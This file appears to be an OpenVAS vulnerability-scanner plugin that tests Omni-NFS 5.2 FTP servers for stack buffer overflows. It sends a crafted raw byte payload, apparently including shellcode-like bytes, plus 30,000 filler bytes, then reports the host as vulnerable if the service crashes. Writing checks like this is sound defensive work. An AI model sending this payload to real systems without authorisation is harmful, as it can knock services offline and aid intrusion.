###############################################################################
# OpenVAS Vulnerability Test
# $Id: Omni_NFS_36608.nasl 7190 2010-03-31 14:02:04Z chandra $
#
# Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100297);
 script_bugtraq_id(36608);
 script_version ("1.0-$Revision: 7190 $");
 script_tag(name:"risk_factor", value:"Low");

 script_name("Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities");

desc = "Overview:
Omni-NFS is prone to multiple stack-based buffer-overflow
vulnerabilities because the application fails to properly bounds-check
user-supplied network data before copying it into an insufficiently
sized memory buffer. The issues affect both server and client.

Exploiting these issues allows attackers to execute arbitrary machine
code in the context of users running the affected application. Failed
attempts will likely crash the application, resulting in denial-of-
service conditions.

Omni-NFS 5.2 is vulnerable; other versions may also be affected.

References:
http://www.securityfocus.com/bid/36608
http://www.xlink.com/nfs_products/NFS_Server/NFS_Server.htm

Risk factor : Low";

 script_description(desc);
 script_summary("Determine if Omni-NFS is prone to a Stack Buffer Overflow");
 script_category(ACT_DENIAL);
 script_family("Buffer overflow");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

include("misc_func.inc");
include("ftp_func.inc");

if(safe_checks())exit(0);

port = get_kb_item("Services/ftp");
if(!port)port = 21;

if(get_kb_item('ftp/'+port+'/broken'))exit(0);
if(!get_port_state(port))exit(0);

banner = get_ftp_banner(port:port);

if("XLINK" >!< banner)exit(0);

soc = open_sock_tcp(port);
if(!soc)exit(0);

crapdata = crap(length:30000);

req = raw_string(0x4e,0x40,0x96,0xb5,0x46,0x89,0xe3,0x4a,0x1c,0xb1,0x98,0x2c,0xb4,0xb3,0x7b,0x39,
0xf5,0xa9,0x7c,0x15,0xb7,0xba,0x8c,0xe1,0x4b,0x90,0x73,0x27,0x7b,0x70,0x75,0x10,
0xe0,0x72,0x4b,0x83,0xeb,0x7a,0x79,0x3c,0xb7,0x48,0x71,0x24,0x7d,0x2d,0xbe,0x40,
0xb0,0x97,0x46,0x0c,0x1c,0x96,0x80,0xd4,0x3b,0xe2,0x41,0x1d,0xba,0x81,0xfd,0x37,
0x04,0x15,0xbb,0x43,0xb6,0x49,0x8d,0x93,0x77,0x66,0x42,0x76,0x78,0x74,0x7f,0x2c,
0x0b,0xf5,0x99,0x47,0xb8,0x9b,0x98,0x29,0xe3,0x05,0x4e,0xb5,0xa9,0xb4,0x14,0x4a,
0xbf,0x86,0xd6,0xb3,0xb9,0x77,0x31,0xf9,0xa8,0xb2,0x7d,0x02,0xd5,0xb1,0x78,0x35,
0x73,0x67,0x7f,0x2a,0xe0,0x34,0x71,0x4f,0x7c,0x03,0xfc,0x91,0x74,0x19,0xeb,0x32,
0xf6,0xe2,0x3f,0x9f,0x7b,0x1a,0xc1,0xf8,0x92,0xbb,0xb3,0x7a,0x18,0xe1,0x42,0x87,
0xf9,0xb4,0x4b,0x79,0x04,0xba,0x75,0x38,0xe3,0x3c,0x98,0x67,0xb6,0xbf,0xa9,0x09,
0xf8,0x91,0xb8,0x4e,0x43,0xb9,0xb7,0x2d,0x72,0x12,0xfc,0x3f,0x9b,0x8d,0x49,0x76,
0x05,0x23,0xd4,0x2c,0x93,0x46,0xb2,0x0c,0x15,0x4a,0x90,0x37,0x1b,0xc0,0xd6,0x24,
0xb5,0x70,0x14,0x48,0x66,0xbe,0x27,0xa8,0x34,0x96,0x88,0xd5,0x1c,0x1d,0x99,0xb0,
0x9f,0x40,0x97,0xf5,0xfd,0x35,0x47,0x92,0xb1,0x41,0x4f,0x81,0xc4,0xff,0xef,0xff,
0xff,0x44,0x31,0xc9,0xbe,0x1c,0x89,0xb0,0x67,0xdb,0xda,0xd9,0x74,0x24,0xf4,0xb1,
0x02,0x58,0x31,0x70,0x13,0x83,0xc0,0x04,0x03,0x70,0x0f,0xe2,0xe9,0x08,0x74,0x33,
0xe3,0xf4,0x8a,0x70,0x9c,0xf0,0x01,0x10) + crapdata + raw_string(0x0d,0x0a);
		  
send(socket:soc, data:req);
close(soc);

sleep(10);

soc1 = open_sock_tcp(port);
if(!soc1) {
 security_warning(port:port);
 exit(0);

} else {

  for(i=0;i<5;i++) {
     if(!ftp_recv_line(socket:soc1)) {
       security_warning(port:port);
       close(soc1);
       exit(0);
     }
 }
}

exit(0);
